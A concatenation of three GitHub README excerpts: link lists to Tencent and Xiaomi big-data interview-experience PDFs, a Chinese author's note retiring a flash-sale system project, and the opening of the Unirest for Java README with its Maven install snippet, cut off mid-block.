偏大数据开发二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20%E5%81%8F%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%20%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [腾讯 偏大数据开发一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20%E5%81%8F%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [腾讯 数据科学暑期实习 一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%20%E4%B8%80%E9%9D%A2.pdf) [腾讯-数据科学(IEG)+数据工程](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF-%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6%EF%BC%88IEG%EF%BC%89%2B%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B.pdf) [腾讯CSIG后台开发一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFCSIG%E5%90%8E%E5%8F%B0%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [腾讯CSIG大数据一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFCSIG%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [腾讯IEG数据中心实习面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFIEG%E6%95%B0%E6%8D%AE%E4%B8%AD%E5%BF%83%E5%AE%9E%E4%B9%A0%E9%9D%A2%E7%BB%8F.pdf) [腾讯PCG数据研发暑期实习一面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFPCG%E6%95%B0%E6%8D%AE%E7%A0%94%E5%8F%91%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) [腾讯TEG-数据平台部-大数据开发实习-一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFTEG-%E6%95%B0%E6%8D%AE%E5%B9%B3%E5%8F%B0%E9%83%A8-%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0-%E4%B8%80%E9%9D%A2.pdf) [腾讯TEG-数据平台部-大数据开发实习-二面(等凉)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFTEG-%E6%95%B0%E6%8D%AE%E5%B9%B3%E5%8F%B0%E9%83%A8-%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0-%E4%BA%8C%E9%9D%A2%EF%BC%88%E7%AD%89%E5%87%89%EF%BC%89.pdf) [腾讯TEG大数据一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFTEG%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [腾讯teg大数据 凉](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFteg%E5%A4%A7%E6%95%B0%E6%8D%AE%20%E5%87%89.pdf) [腾讯云智 数据工程 面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E4%BA%91%E6%99%BA%20%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%20%E9%9D%A2%E7%BB%8F.pdf) [腾讯云智暑期实习-数据工程 一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E4%BA%91%E6%99%BA%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0-%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%20%E4%B8%80%E9%9D%A2.pdf) [腾讯大数据开发一面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) [腾讯大数据开发实习](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0.pdf) [腾讯微保实习一面(数据开发工程师)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%BE%AE%E4%BF%9D%E5%AE%9E%E4%B9%A0%E4%B8%80%E9%9D%A2%EF%BC%88%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%B7%A5%E7%A8%8B%E5%B8%88%EF%BC%89.pdf) [腾讯微保实习二面(数据开发工程师)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%BE%AE%E4%BF%9D%E5%AE%9E%E4%B9%A0%E4%BA%8C%E9%9D%A2%EF%BC%88%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%B7%A5%E7%A8%8B%E5%B8%88%EF%BC%89.pdf) [腾讯微信读书 数据科学 暑期实习 一面【放弃笔试但被捞】](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%BE%AE%E4%BF%A1%E8%AF%BB%E4%B9%A6%20%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6%20%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%20%E4%B8%80%E9%9D%A2%E3%80%90%E6%94%BE%E5%BC%83%E7%AC%94%E8%AF%95%E4%BD%86%E8%A2%AB%E6%8D%9E%E3%80%91.pdf) [腾讯数开面筋-全程无八股](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%95%B0%E5%BC%80%E9%9D%A2%E7%AD%8B-%E5%85%A8%E7%A8%8B%E6%97%A0%E5%85%AB%E8%82%A1.pdf) [腾讯数据工程凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%E5%87%89%E7%BB%8F.pdf) [腾讯数据工程面经(1)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%E9%9D%A2%E7%BB%8F%EF%BC%881%EF%BC%89.pdf) [腾讯数据工程面经(2)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%E9%9D%A2%E7%BB%8F%EF%BC%882%EF%BC%89.pdf) [腾讯暑期实习 数据科学一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%20%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [腾讯秋招大数据运维开发一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E7%A7%8B%E6%8B%9B%E5%A4%A7%E6%95%B0%E6%8D%AE%E8%BF%90%E7%BB%B4%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2.pdf) [阿里、腾讯大数据提前批面经(已拿offer)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E9%98%BF%E9%87%8C%E3%80%81%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%8F%90%E5%89%8D%E6%89%B9%E9%9D%A2%E7%BB%8F(%E5%B7%B2%E6%8B%BFoffer).pdf) [面试复盘|腾讯-腾讯大数据 一面凉经!!!](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E9%9D%A2%E8%AF%95%E5%A4%8D%E7%9B%98%EF%BD%9C%E8%85%BE%E8%AE%AF-%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%20%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F%EF%BC%81%EF%BC%81%EF%BC%81.pdf) #### 小米面经 [2023-3-27 小米-汽车-大数据开发](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/2023-3-27%20%E5%B0%8F%E7%B1%B3-%E6%B1%BD%E8%BD%A6-%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91-1.pdf) [小米 大数据 一面 二面(凉经)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%20%E5%A4%A7%E6%95%B0%E6%8D%AE%20%E4%B8%80%E9%9D%A2%20%E4%BA%8C%E9%9D%A2%EF%BC%88%E5%87%89%E7%BB%8F%EF%BC%89.pdf) [小米 大数据开发 一面视频面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%20%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%20%E4%B8%80%E9%9D%A2%E8%A7%86%E9%A2%91%E9%9D%A2.pdf) [小米 大数据开发 已oc](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%20%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%20%E5%B7%B2oc.pdf) [小米、头条、知乎面试题总结](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E3%80%81%E5%A4%B4%E6%9D%A1%E3%80%81%E7%9F%A5%E4%B9%8E%E9%9D%A2%E8%AF%95%E9%A2%98%E6%80%BB%E7%BB%93_%E4%B8%8D%E6%B8%85%E4%B8%8D%E6%85%8E%E7%9A%84%E5%8D%9A%E5%AE%A2-CSDN%E5%8D%9A%E5%AE%A2.pdf) [小米凉面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%87%89%E9%9D%A2.pdf) [小米大数据一二面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E4%BA%8C%E9%9D%A2.pdf) [小米大数据一二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [小米大数据一二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F02.pdf) [小米大数据开发一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2.pdf) [小米大数据开发一面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) [小米大数据开发二面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [小米大数据开发实习面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0%E9%9D%A2%E7%BB%8F.pdf) [小米大数据开发岗一面、二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%B2%97%E4%B8%80%E9%9D%A2%E3%80%81%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [小米大数据开发工程师(base北京)已OC](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%B7%A5%E7%A8%8B%E5%B8%88%EF%BC%88base%E5%8C%97%E4%BA%AC%EF%BC%89%E5%B7%B2OC.pdf) [小米大数据开发面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E9%9D%A2%E7%BB%8F.pdf) [小米大数据提前批一面二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%8F%90%E5%89%8D%E6%89%B9%E4%B8%80%E9%9D%A2%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [小米大数据日常实习一二三面(已oc)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%97%A5%E5%B8%B8%E5%AE%9E%E4%B9%A0%E4%B8%80%E4%BA%8C%E4%B8%89%E9%9D%A2%EF%BC%88%E5%B7%B2oc%EF%BC%89.pdf) [小米大数据日常面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%97%A5%E5%B8%B8%E9%9D%A2%E7%BB%8F.pdf) [小米大数据研发(已OC)timeline](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%A0%94%E5%8F%91%EF%BC%88%E5%B7%B2OC%EF%BC%89timeline.pdf) [小米大数据面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F.pdf) [小米面经,二面等通知中](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E9%9D%A2%E7%BB%8F%EF%BC%8C%E4%BA%8C%E9%9D%A2%E7%AD%89%E9%80%9A%E7%9F%A5%E4%B8%AD%E3%80%82.pdf) 大数据&后端书籍 --- PDF书籍(含Hadoop、Spark、Flink等大数据书籍)在公众号回复关键字“大数据书籍”或“Java书籍”自行进百度云盘群保存即可 ## 交流群 交流群建好了,进群的小伙伴可以加我微信:**MoRan1607,备注:GitHub** <p align="center"> <img src="https://github.com/Dr11ft/BigDataGuide/blob/master/Pics/%E5%BE%AE%E4%BF%A1.jpg" width="200" height="200"/> <p align="center"> </p> </p>
0
qiurunze123/miaosha
⭐⭐⭐⭐秒杀系统设计与实现.互联网工程师进阶与分析🙋🐓
null
![互联网 Java 秒杀系统设计与架构](https://raw.githubusercontent.com/qiurunze123/imageall/master/miaoshashejitu.png) > 朋友们,感谢大家对我文章的支持。时间过得很快, 这部分内容还是我几年前刚毕业时写的,而且也只是个人项目,被公众号文章给我一顿喷,博主内容我也看了,晚上回到家就简单的回复下, 想了一下,因为确实没精力维护,对于小白会造成误导,决定下线这个项目,这是我的第一个项目,就让他成回忆吧!以免对自己造成困扰! 大家以后还是可以微信交流其它问题,有时间也会为大家解答! >1.理性看待 我本意是将一些自己的思路和方向表达出来,因为star的激增,我也就做了最初的一版规划,那时候刚毕业没多久,很荣幸这个项目从一个小项目扩张成了大项目,但也都是一些当时不成熟的想法 ,项目没有完全完成, 也只是自己练手的入门级项目,旨在学习更多的知识,所有大家在看到这个项目的时候要有更多自己的思考和过滤,不要一味的照搬照抄!最后那些不理性的同学,给大家推荐俩本书 《我就是你啊》和《非暴力沟通》没准可以让你进化!
0
Kong/unirest-java
Unirest in Java: Simplified, lightweight HTTP client library.
null
# Unirest for Java [![Actions Status](https://github.com/kong/unirest-java/workflows/Verify/badge.svg)](https://github.com/kong/unirest-java/actions) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.konghq/unirest-java-parent/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.kong/unirest-java) [![Javadocs](http://www.javadoc.io/badge/com.konghq/unirest-java-core.svg)](http://www.javadoc.io/doc/com.konghq/unirest-java) ## Unirest 4 Unirest 4 is build on modern Java standards, and as such requires at least Java 11. Unirest 4's dependencies are fully modular, and have been moved to new Maven coordinates to avoid conflicts with the previous versions. You can use a maven bom to manage the modules: ### Install With Maven ```xml <dependencyManagement> <dependencies> <!-- https://mvnrepository.com/artifact/com.konghq/unirest-java-bom --> <dependency> <groupId>com.konghq</groupId> <artifactId>unirest-java-bom</artifactId> <version>4.3.1</version> <type>pom</type> <scope>import</scope> </dependency> </dependencies> </dependencyManagement> <dependencies> <!-- 